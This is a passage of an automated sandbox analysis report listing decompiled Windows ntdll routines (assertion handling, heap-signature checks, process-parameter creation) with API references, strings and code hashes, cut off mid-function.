                                                                                                                            0x00000000
                                                                                                                            0x6b275171
                                                                                                                            0x6b2751de
                                                                                                                            0x6b2751df
                                                                                                                            0x6b2751df
                                                                                                                            0x6b2751e4
                                                                                                                            0x6b2751e6
                                                                                                                            0x00000000
                                                                                                                            0x6b2751e6
                                                                                                                            0x6b275173
                                                                                                                            0x6b27517a
                                                                                                                            0x6b27517d
                                                                                                                            0x6b27518b
                                                                                                                            0x6b27518e
                                                                                                                            0x6b27518e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b275190
                                                                                                                            0x6b275193
                                                                                                                            0x6b2751ad
                                                                                                                            0x6b2751bd
                                                                                                                            0x6b2751c2
                                                                                                                            0x6b2751c5
                                                                                                                            0x6b2751cd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2751d6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2751dc
                                                                                                                            0x6b275195
                                                                                                                            0x6b275198
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b27519d
                                                                                                                            0x6b27519f
                                                                                                                            0x6b2751a4
                                                                                                                            0x6b2751a6
                                                                                                                            0x6b2751a6
                                                                                                                            0x00000000
                                                                                                                            0x6b27519d
                                                                                                                            0x6b27517f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b275181
                                                                                                                            0x6b275181
                                                                                                                            0x6b275184
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b275186
                                                                                                                            0x00000000
                                                                                                                            0x6b275186
                                                                                                                            0x6b2751fb

                                                                                                                            APIs
                                                                                                                            • RtlCaptureContext.1105(?,00000000,00000000,?), ref: 6B275128
                                                                                                                            • DbgPrintEx.1105(00000065,00000000,*** Assertion failed: %s%s*** Source File: %s, line %ld,6B23D3E5,000001B2,?,?,?,00000000,00000000,?), ref: 6B275147
                                                                                                                            • DbgPrompt.1105(Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? ,?,00000002,?,?,?,?,00000000,00000000,?), ref: 6B27516A
                                                                                                                            • ZwTerminateThread.1105(000000FE,C0000001,Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? ,?,00000002,?,?,?,?,00000000,00000000,?), ref: 6B2751A6
                                                                                                                            • DbgPrintEx.1105(00000065,00000000,Execute '.cxr %p' to dump context,?,Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? ,?,00000002,?,?,?,?,00000000,00000000,?), ref: 6B2751BD
                                                                                                                            • ZwTerminateProcess.1105(000000FF,C0000001,Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? ,?,00000002,?,?,?,?,00000000,00000000,?), ref: 6B2751E6
                                                                                                                            Strings
                                                                                                                            • O, xrefs: 6B2751CF
                                                                                                                            • Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? , xrefs: 6B275165
                                                                                                                            • *** Assertion failed: %s%s*** Source File: %s, line %ld, xrefs: 6B27513E
                                                                                                                            • Execute '.cxr %p' to dump context, xrefs: 6B2751B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: PrintTerminate$CaptureContextProcessPromptThread
                                                                                                                            • String ID: *** Assertion failed: %s%s*** Source File: %s, line %ld$Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$O
                                                                                                                            • API String ID: 3567286327-2386179708
                                                                                                                            • Opcode ID: 2f9a230f54afaef076d1f0d703f87245b0e765143a17e82f7713d44197320ae7
                                                                                                                            • Instruction ID: cb6e62d6ecb7830422a11c40172232a0ab4f9c69cf9a80a81a06e2cca7eb0a9b
                                                                                                                            • Opcode Fuzzy Hash: 2f9a230f54afaef076d1f0d703f87245b0e765143a17e82f7713d44197320ae7
                                                                                                                            • Instruction Fuzzy Hash: 03217D3291014E3BEB30A9748CD5FAAB7D8DB01357F1045E1FB24A60C0D33C9E018668
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D40E1, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 29%
                                                                                                                            			E6B1D40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E6B1DB150();
					} else {
						E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E6B1DB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E6B1DB150(", passed to %s", _t29);
					}
					_push("\n");
					E6B1DB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x6b2c6378 = 1;
						asm("int3");
						 *0x6b2c6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                            0x6b1d40e6
                                                                                                                            0x6b1d40e8
                                                                                                                            0x6b1d40f1
                                                                                                                            0x6b23042d
                                                                                                                            0x6b23044c
                                                                                                                            0x6b230451
                                                                                                                            0x6b23042f
                                                                                                                            0x6b230444
                                                                                                                            0x6b230449
                                                                                                                            0x6b23045d
                                                                                                                            0x6b230466
                                                                                                                            0x6b23046e
                                                                                                                            0x6b230474
                                                                                                                            0x6b230475
                                                                                                                            0x6b23047a
                                                                                                                            0x6b23048a
                                                                                                                            0x6b23048c
                                                                                                                            0x6b230493
                                                                                                                            0x6b230494
                                                                                                                            0x6b230494
                                                                                                                            0x00000000
                                                                                                                            0x6b23049b
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,6B2938D6), ref: 6B230444
                                                                                                                            • DbgPrint.1105(Invalid heap signature for heap at %p,?,?,?,?,?,?,?,6B2938D6), ref: 6B23045D
                                                                                                                            • DbgPrint.1105(, passed to %s,RtlGetUserInfoHeap,?,?,?,?,?,?,6B2938D6), ref: 6B23046E
                                                                                                                            • DbgPrint.1105(6B1B6B94,?,?,?,?,?,?,6B2938D6), ref: 6B23047A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlGetUserInfoHeap
                                                                                                                            • API String ID: 3558298466-609737958
                                                                                                                            • Opcode ID: 07eebfdba50b2edee10b0920bc1671b23a9ff1070bd325f4a25448dc2e7da278
                                                                                                                            • Instruction ID: 41f3d9e5ac0e54ee17877580717e9b85ae66347b3ba3b3d121d95fc9cd03bcb1
                                                                                                                            • Opcode Fuzzy Hash: 07eebfdba50b2edee10b0920bc1671b23a9ff1070bd325f4a25448dc2e7da278
                                                                                                                            • Instruction Fuzzy Hash: E901243211415AFED25987B4A58DF93B7F4DB01B30F19806DF00947680CB7CA480C231
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D6800, Relevance: 16.9, APIs: 11, Instructions: 373memoryCOMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 98%
                                                                                                                            			E6B1D6800(void* __ebx, void* __edi, void* __esi, void** _a4, signed short* _a8, intOrPtr _a12, signed short* _a16, signed short* _a20, void* _a24, intOrPtr* _a28, intOrPtr* _a32, intOrPtr* _a36, intOrPtr* _a40, signed char _a44) {
				char _v5;
				void* _v12;
				void _v16;
				int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				void* _t131;
				intOrPtr* _t132;
				int _t153;
				long _t154;
				void* _t158;
				void _t162;
				void* _t194;
				int _t196;
				void* _t205;
				void* _t206;
				signed short* _t207;
				void* _t209;
				signed int _t211;
				intOrPtr* _t212;
				signed short* _t213;
				signed int _t215;
				signed short* _t217;
				void* _t219;
				void _t228;
				void _t229;
				signed int _t238;
				intOrPtr _t256;
				void* _t262;
				short _t268;
				intOrPtr _t269;
				signed int _t271;
				void* _t272;
				intOrPtr* _t273;
				void* _t275;
				intOrPtr* _t276;
				long _t278;
				void* _t279;

				_t275 = __esi;
				_t272 = __edi;
				_t205 = __ebx;
				if((_a44 & 0xfffffffe) != 0) {
					L61:
					return 0xc000000d;
				}
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				if(E6B1D6BF3(_a8) < 0) {
					goto L61;
				}
				_t256 = _a12;
				_t215 = 0;
				if(_t256 != 0) {
					_t124 = E6B1D6BF3(_t256);
					_t215 = 0;
				} else {
					_t124 = 0;
				}
				if(_t124 < 0) {
					goto L61;
				} else {
					_push(_t205);
					_v5 = _t215;
					_v32 = _t215;
					_t217 = _a16;
					_t206 = 0x5c;
					if(_t217 == 0) {
						L12:
						_t207 = _a20;
						if(_t207 == 0) {
							_t125 = 0;
						} else {
							_t125 = E6B1D6BF3(_t207);
						}
						if(_t125 < 0) {
							L65:
							_t126 = 0xc000000d;
							goto L53;
						} else {
							_t218 = _a28;
							if(_a28 == 0) {
								_t219 = 0;
								_t127 = 0;
							} else {
								_t127 = E6B1D6BF3(_t218);
								_t219 = 0;
							}
							if(_t127 < 0) {
								goto L65;
							} else {
								_t128 = _a32;
								if(_a32 == 0) {
									_t129 = _t219;
								} else {
									_t129 = E6B1D6BF3(_t128);
									_t219 = 0;
								}
								if(_t129 < 0) {
									goto L65;
								} else {
									_push(_t275);
									_t276 = _a36;
									if(_t276 == 0) {
										_t130 = _t219;
									} else {
										_t130 = E6B1D6BF3(_t276);
										_t219 = 0;
									}
									if(_t130 < 0) {
										_t126 = 0xc000000d;
										goto L52;
									} else {
										_push(_t272);
										_t273 = _a40;
										if(_t273 == 0) {
											_t131 = _t219;
										} else {
											_t131 = E6B1D6BF3(_t273);
										}
										if(_t131 < 0) {
											_t126 = 0xc000000d;
											goto L51;
										} else {
											if(_t207 == 0) {
												_t207 = _a8;
												_a20 = _t207;
											}
											_t132 = _a28;
											if(_t132 == 0) {
												_t132 = 0x6b1b1ab0;
												_a28 = 0x6b1b1ab0;
											}
											if(_a32 == 0) {
												_a32 = 0x6b1b1ab0;
											}
											if(_t276 == 0) {
												_t276 = 0x6b1b1ab0;
												_a36 = 0x6b1b1ab0;
											}
											if(_t273 == 0) {
												_t273 = 0x6b1b1ab0;
											}
											_t209 = 3;
											_t278 = 0;
											_t228 = (( *_t207 & 0x0000ffff) + 0x00000005 & 0xfffffffc) + (( *(_t132 + 2) & 0x0000ffff) + _t209 & 0xfffffffc) + (( *_a8 & 0x0000ffff) + 0x00000005 & 0xfffffffc) + (( *(_a32 + 2) & 0x0000ffff) + _t209 & 0xfffffffc) + 0x4ac + (( *(_t276 + 2) & 0x0000ffff) + _t209 & 0xfffffffc);
											_v16 = _t228;
											if( *_t273 != 0) {
												_t228 = _t228 + (( *(_t273 + 2) & 0x0000ffff) + _t209 & 0xfffffffc);
												_v16 = _t228;
											}
											if(_t256 != 0) {
												_t229 = _t228 + (( *(_t256 + 2) & 0x0000ffff) + _t209 & 0xfffffffc);
												_v16 = _t229;
											}
											if(_a24 != _t278) {
												_t153 = E6B20585B(_a24, 1);
												_t229 = _v16;
											} else {
												_t153 =  *((intOrPtr*)(_v24 + 0x290));
											}
											_v20 = _t153;
											_t211 = _t153 + 0x00000003 & 0xfffffffc;
											if(_t211 < _t153) {
												L77:
												_t126 = 0xc0000095;
												goto L51;
											} else {
												while(1) {
													_t154 = _t211 + _t229;
													if(_t154 < _t229) {
														goto L77;
													}
													_t279 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), _t278, _t154);
													if(_t279 == 0) {
														_t126 = 0xc000009a;
														L51:
														L52:
														L53:
														return _t126;
													}
													_t158 = _t279 + _v16;
													_v12 = _t158;
													if(_a24 != 0) {
														memcpy(_t158, _a24, _v20);
														L42:
														memset(_t279, 0, 0x2a4);
														_t162 = _v16;
														 *_t279 = _t162;
														 *(_t279 + 4) = _t162;
														 *(_t279 + 0x290) = _t211;
														 *((intOrPtr*)(_t279 + 0xc)) = 0;
														_t53 = _t279 + 0x24; // 0x24
														_t212 = _t53;
														 *((intOrPtr*)(_t279 + 0x2c)) = 0;
														 *((intOrPtr*)(_t279 + 0x48)) = _v12;
														_t57 = _t279 + 0x2a4; // 0x2a4
														_v12 = _t57;
														 *((intOrPtr*)(_t279 + 8)) = 1;
														 *(_t279 + 0x14) =  *(_v24 + 0x14) & 1;
														_t169 = _a16;
														if(_a16 == 0) {
															L6B1EEEF0(0x6b2c79a0);
															E6B1D6C14( &_v12, _t212, _v24 + 0x24, 0x208);
															E6B1EEB70( &_v12, 0x6b2c79a0);
														} else {
															E6B1D6C14( &_v12, _t212, _t169, 0x208);
															if(_v5 != 0) {
																_t268 = 0x5c;
																 *((short*)( *((intOrPtr*)(_t279 + 0x28)) + _v32 * 2)) = _t268;
																_t194 = 2;
																 *_t212 =  *_t212 + _t194;
															}
														}
														_t234 = _a12;
														if(_a12 != 0) {
															_t104 = _t279 + 0x30; // 0x30
															E6B1D6C14( &_v12, _t104, _t234,  *(_t234 + 2) & 0x0000ffff);
														}
														_t72 = _t279 + 0x38; // 0x38
														E6B1D6C14( &_v12, _t72, _a8, ( *_a8 & 0x0000ffff) + 2);
														_t213 = _a20;
														_t75 = _t279 + 0x40; // 0x40
														_t262 = _t75;
														_t238 =  *_t213 & 0x0000ffff;
														_t180 = _t213[1] & 0x0000ffff;
														if(_t238 != (_t213[1] & 0x0000ffff)) {
															_t180 = _t238 + 2;
														}
														E6B1D6C14( &_v12, _t262, _t213, _t180);
														_t80 = _t279 + 0x70; // 0x70
														E6B1D6C14( &_v12, _t80, _a28,  *(_a28 + 2) & 0x0000ffff);
														_t84 = _t279 + 0x78; // 0x78
														E6B1D6C14( &_v12, _t84, _a32,  *(_a32 + 2) & 0x0000ffff);
														_t88 = _t279 + 0x80; // 0x80
														E6B1D6C14( &_v12, _t88, _a36,  *(_a36 + 2) & 0x0000ffff);
														if( *_t273 != 0) {
															_t118 = _t279 + 0x88; // 0x88
															E6B1D6C14( &_v12, _t118, _t273,  *(_t273 + 2) & 0x0000ffff);
														}
														if((_a44 & 0x00000001) == 0) {
															_t279 = E6B25BCB0(_t279);
														}
														_t126 = 0;
														 *_a4 = _t279;
														goto L51;
													}
													L6B1EEEF0(0x6b2c79a0);
													_t269 = _v24;
													_t196 =  *(_t269 + 0x290);
													_v20 = _t196;
													_t251 = _t196 + 0x00000003 & 0xfffffffc;
													_v28 = _t196 + 0x00000003 & 0xfffffffc;
													if(_t196 > _t211) {
														E6B1EEB70(_t251, 0x6b2c79a0);
														_t278 = 0;
														RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t279);
														_t211 = _v28;
														_t229 = _v16;
														if(_t211 >= _v20) {
															continue;
														}
														goto L77;
													}
													memcpy(_v12,  *(_t269 + 0x48), _t196);
													E6B1EEB70(_t251, 0x6b2c79a0);
													_t211 = _v28;
													goto L42;
												}
												goto L77;
											}
										}
									}
								}
							}
						}
					}
					_t271 = ( *_t217 & 0x0000ffff) >> 1;
					_v32 = _t271;
					if(E6B1D6BF3(_t217) < 0 || _t271 == 0) {
						goto L65;
					} else {
						if( *((intOrPtr*)(_t217[2] + _t271 * 2 - 2)) == _t206) {
							L11:
							_t256 = _a12;
							goto L12;
						}
						if(_t271 > 0x103) {
							goto L65;
						}
						_v5 = 1;
						goto L11;
					}
				}
			}
















































                                                                                                                            0x6b1d6800
                                                                                                                            0x6b1d6800
                                                                                                                            0x6b1d6800
                                                                                                                            0x6b1d680f
                                                                                                                            0x6b231b26
                                                                                                                            0x00000000
                                                                                                                            0x6b231b26
                                                                                                                            0x6b1d6821
                                                                                                                            0x6b1d682b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6831
                                                                                                                            0x6b1d6834
                                                                                                                            0x6b1d6838
                                                                                                                            0x6b1d6b68
                                                                                                                            0x6b1d6b6d
                                                                                                                            0x6b1d683e
                                                                                                                            0x6b1d683e
                                                                                                                            0x6b1d683e
                                                                                                                            0x6b1d6842
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6848
                                                                                                                            0x6b1d6848
                                                                                                                            0x6b1d6849
                                                                                                                            0x6b1d684c
                                                                                                                            0x6b1d684f
                                                                                                                            0x6b1d6854
                                                                                                                            0x6b1d6857
                                                                                                                            0x6b1d6893
                                                                                                                            0x6b1d6893
                                                                                                                            0x6b1d6898
                                                                                                                            0x6b231b30
                                                                                                                            0x6b1d689e
                                                                                                                            0x6b1d68a0
                                                                                                                            0x6b1d68a0
                                                                                                                            0x6b1d68a7
                                                                                                                            0x6b231b47
                                                                                                                            0x6b231b47
                                                                                                                            0x00000000
                                                                                                                            0x6b1d68ad
                                                                                                                            0x6b1d68ad
                                                                                                                            0x6b1d68b2
                                                                                                                            0x6b231b37
                                                                                                                            0x6b231b39
                                                                                                                            0x6b1d68b8
                                                                                                                            0x6b1d68b8
                                                                                                                            0x6b1d68bd
                                                                                                                            0x6b1d68bd
                                                                                                                            0x6b1d68c1
                                                                                                                            0x00000000
                                                                                                                            0x6b1d68c7
                                                                                                                            0x6b1d68c7
                                                                                                                            0x6b1d68cc
                                                                                                                            0x6b231b40
                                                                                                                            0x6b1d68d2
                                                                                                                            0x6b1d68d4
                                                                                                                            0x6b1d68d9
                                                                                                                            0x6b1d68d9
                                                                                                                            0x6b1d68dd
                                                                                                                            0x00000000
                                                                                                                            0x6b1d68e3
                                                                                                                            0x6b1d68e3
                                                                                                                            0x6b1d68e4
                                                                                                                            0x6b1d68e9
                                                                                                                            0x6b231b51
                                                                                                                            0x6b1d68ef
                                                                                                                            0x6b1d68f1
                                                                                                                            0x6b1d68f6
                                                                                                                            0x6b1d68f6
                                                                                                                            0x6b1d68fa
                                                                                                                            0x6b231b58
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6900
                                                                                                                            0x6b1d6900
                                                                                                                            0x6b1d6901
                                                                                                                            0x6b1d6906
                                                                                                                            0x6b231b62
                                                                                                                            0x6b1d690c
                                                                                                                            0x6b1d690e
                                                                                                                            0x6b1d690e
                                                                                                                            0x6b1d6915
                                                                                                                            0x6b231b69
                                                                                                                            0x00000000
                                                                                                                            0x6b1d691b
                                                                                                                            0x6b1d691d
                                                                                                                            0x6b231b73
                                                                                                                            0x6b231b76
                                                                                                                            0x6b231b76
                                                                                                                            0x6b1d6923
                                                                                                                            0x6b1d692d
                                                                                                                            0x6b231b7e
                                                                                                                            0x6b231b80
                                                                                                                            0x6b231b80
                                                                                                                            0x6b1d6937
                                                                                                                            0x6b231b88
                                                                                                                            0x6b231b88
                                                                                                                            0x6b1d693f
                                                                                                                            0x6b231b90
                                                                                                                            0x6b231b92
                                                                                                                            0x6b231b92
                                                                                                                            0x6b1d6947
                                                                                                                            0x6b231b9a
                                                                                                                            0x6b231b9a
                                                                                                                            0x6b1d6959
                                                                                                                            0x6b1d698f
                                                                                                                            0x6b1d6991
                                                                                                                            0x6b1d6993
                                                                                                                            0x6b1d6999
                                                                                                                            0x6b231baa
                                                                                                                            0x6b231bac
                                                                                                                            0x6b231bac
                                                                                                                            0x6b1d69a1
                                                                                                                            0x6b1d6b7d
                                                                                                                            0x6b1d6b7f
                                                                                                                            0x6b1d6b7f
                                                                                                                            0x6b1d69aa
                                                                                                                            0x6b1d6b8d
                                                                                                                            0x6b1d6b92
                                                                                                                            0x6b1d69b0
                                                                                                                            0x6b1d69b3
                                                                                                                            0x6b1d69b3
                                                                                                                            0x6b1d69bc
                                                                                                                            0x6b1d69bf
                                                                                                                            0x6b1d69c4
                                                                                                                            0x6b231bdf
                                                                                                                            0x6b231bdf
                                                                                                                            0x00000000
                                                                                                                            0x6b1d69ca
                                                                                                                            0x6b1d69ca
                                                                                                                            0x6b1d69ca
                                                                                                                            0x6b1d69cf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d69e5
                                                                                                                            0x6b1d69e9
                                                                                                                            0x6b231c0f
                                                                                                                            0x6b1d6b5d
                                                                                                                            0x6b1d6b5e
                                                                                                                            0x6b1d6b5f
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6b5f
                                                                                                                            0x6b1d69f2
                                                                                                                            0x6b1d69f8
                                                                                                                            0x6b1d69fb
                                                                                                                            0x6b1d6ba1
                                                                                                                            0x6b1d6a44
                                                                                                                            0x6b1d6a4d
                                                                                                                            0x6b1d6a52
                                                                                                                            0x6b1d6a57
                                                                                                                            0x6b1d6a5a
                                                                                                                            0x6b1d6a62
                                                                                                                            0x6b1d6a68
                                                                                                                            0x6b1d6a6b
                                                                                                                            0x6b1d6a6b
                                                                                                                            0x6b1d6a6e
                                                                                                                            0x6b1d6a74
                                                                                                                            0x6b1d6a77
                                                                                                                            0x6b1d6a7d
                                                                                                                            0x6b1d6a83
                                                                                                                            0x6b1d6a8b
                                                                                                                            0x6b1d6a8e
                                                                                                                            0x6b1d6a93
                                                                                                                            0x6b1d6bb3
                                                                                                                            0x6b1d6bc9
                                                                                                                            0x6b1d6bd3
                                                                                                                            0x6b1d6a99
                                                                                                                            0x6b1d6aa4
                                                                                                                            0x6b1d6aad
                                                                                                                            0x6b1d6ab7
                                                                                                                            0x6b1d6aba
                                                                                                                            0x6b1d6abe
                                                                                                                            0x6b1d6abf
                                                                                                                            0x6b1d6abf
                                                                                                                            0x6b1d6aad
                                                                                                                            0x6b1d6ac2
                                                                                                                            0x6b1d6ac7
                                                                                                                            0x6b1d6be1
                                                                                                                            0x6b1d6be9
                                                                                                                            0x6b1d6be9
                                                                                                                            0x6b1d6ad0
                                                                                                                            0x6b1d6ade
                                                                                                                            0x6b1d6ae3
                                                                                                                            0x6b1d6ae6
                                                                                                                            0x6b1d6ae6
                                                                                                                            0x6b1d6ae9
                                                                                                                            0x6b1d6aec
                                                                                                                            0x6b1d6af3
                                                                                                                            0x6b1d6af5
                                                                                                                            0x6b1d6af5
                                                                                                                            0x6b1d6afd
                                                                                                                            0x6b1d6b05
                                                                                                                            0x6b1d6b11
                                                                                                                            0x6b1d6b19
                                                                                                                            0x6b1d6b25
                                                                                                                            0x6b1d6b2d
                                                                                                                            0x6b1d6b3c
                                                                                                                            0x6b1d6b46
                                                                                                                            0x6b231bed
                                                                                                                            0x6b231bf8
                                                                                                                            0x6b231bf8
                                                                                                                            0x6b1d6b50
                                                                                                                            0x6b231c08
                                                                                                                            0x6b231c08
                                                                                                                            0x6b1d6b59
                                                                                                                            0x6b1d6b5b
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6b5b
                                                                                                                            0x6b1d6a06
                                                                                                                            0x6b1d6a0b
                                                                                                                            0x6b1d6a0e
                                                                                                                            0x6b1d6a14
                                                                                                                            0x6b1d6a1a
                                                                                                                            0x6b1d6a1d
                                                                                                                            0x6b1d6a22
                                                                                                                            0x6b231bb9
                                                                                                                            0x6b231bc5
                                                                                                                            0x6b231bcb
                                                                                                                            0x6b231bd0
                                                                                                                            0x6b231bd3
                                                                                                                            0x6b231bd9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231bd9
                                                                                                                            0x6b1d6a2f
                                                                                                                            0x6b1d6a3c
                                                                                                                            0x6b1d6a41
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6a41
                                                                                                                            0x00000000
                                                                                                                            0x6b1d69ca
                                                                                                                            0x6b1d69c4
                                                                                                                            0x6b1d6915
                                                                                                                            0x6b1d68fa
                                                                                                                            0x6b1d68dd
                                                                                                                            0x6b1d68c1
                                                                                                                            0x6b1d68a7
                                                                                                                            0x6b1d685c
                                                                                                                            0x6b1d685e
                                                                                                                            0x6b1d6868
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6876
                                                                                                                            0x6b1d687e
                                                                                                                            0x6b1d6890
                                                                                                                            0x6b1d6890
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6890
                                                                                                                            0x6b1d6886
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d688c
                                                                                                                            0x00000000
                                                                                                                            0x6b1d688c
                                                                                                                            0x6b1d6868

                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?), ref: 6B1D69E0
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C79A0,?,00000000,?), ref: 6B1D6A06
                                                                                                                            • memcpy.1105(?,?,?,6B2C79A0,?,00000000,?), ref: 6B1D6A2F
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C79A0), ref: 6B1D6A3C
                                                                                                                            • memset.1105(00000000,00000000,000002A4,6B2C79A0), ref: 6B1D6A4D
                                                                                                                              • Part of subcall function 6B1D6C14: memcpy.1105(?,?,?,?,00000000,00000024,?,?,6B1D6BCE,?,00000208,6B2C79A0,?,?,6B2C79A0), ref: 6B1D6C39
                                                                                                                              • Part of subcall function 6B1D6C14: memset.1105(00000208,00000000,00000208,?,00000000,00000024,?,?,6B1D6BCE,?,00000208,6B2C79A0,?,?,6B2C79A0), ref: 6B1D6C71
                                                                                                                            • RtlDeNormalizeProcessParams.1105(00000000,?,?,00000000,?,?,?,?,?,?,-00000002,?,00000208), ref: 6B231C03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionmemcpymemset$AllocateEnterHeapLeaveNormalizeParamsProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2315816726-0
                                                                                                                            • Opcode ID: 5b0c7c1c29a31f97ec1547607178511baca7a6e3ce9771a49368b6fc9017f1c6
                                                                                                                            • Instruction ID: d7aae8803b885689be35df18e8b425abcb30c8a5f4f1a27b27ef454cae2e1cf2
                                                                                                                            • Opcode Fuzzy Hash: 5b0c7c1c29a31f97ec1547607178511baca7a6e3ce9771a49368b6fc9017f1c6
                                                                                                                            • Instruction Fuzzy Hash: C5D1D271B4022EAFCB04CF68C891BAA77F1EF05715F054269E865DB284E73CE985CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2551BE, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 173nativememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E6B2551BE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t101;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t108;
				signed int _t110;
				void* _t113;
				int _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x6b2b05f0);
				E6B22D0E8(__ebx, __edi, __esi);
				 *(_t118 - 0x80) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					L6B1EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *(_t118 - 0x80);
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
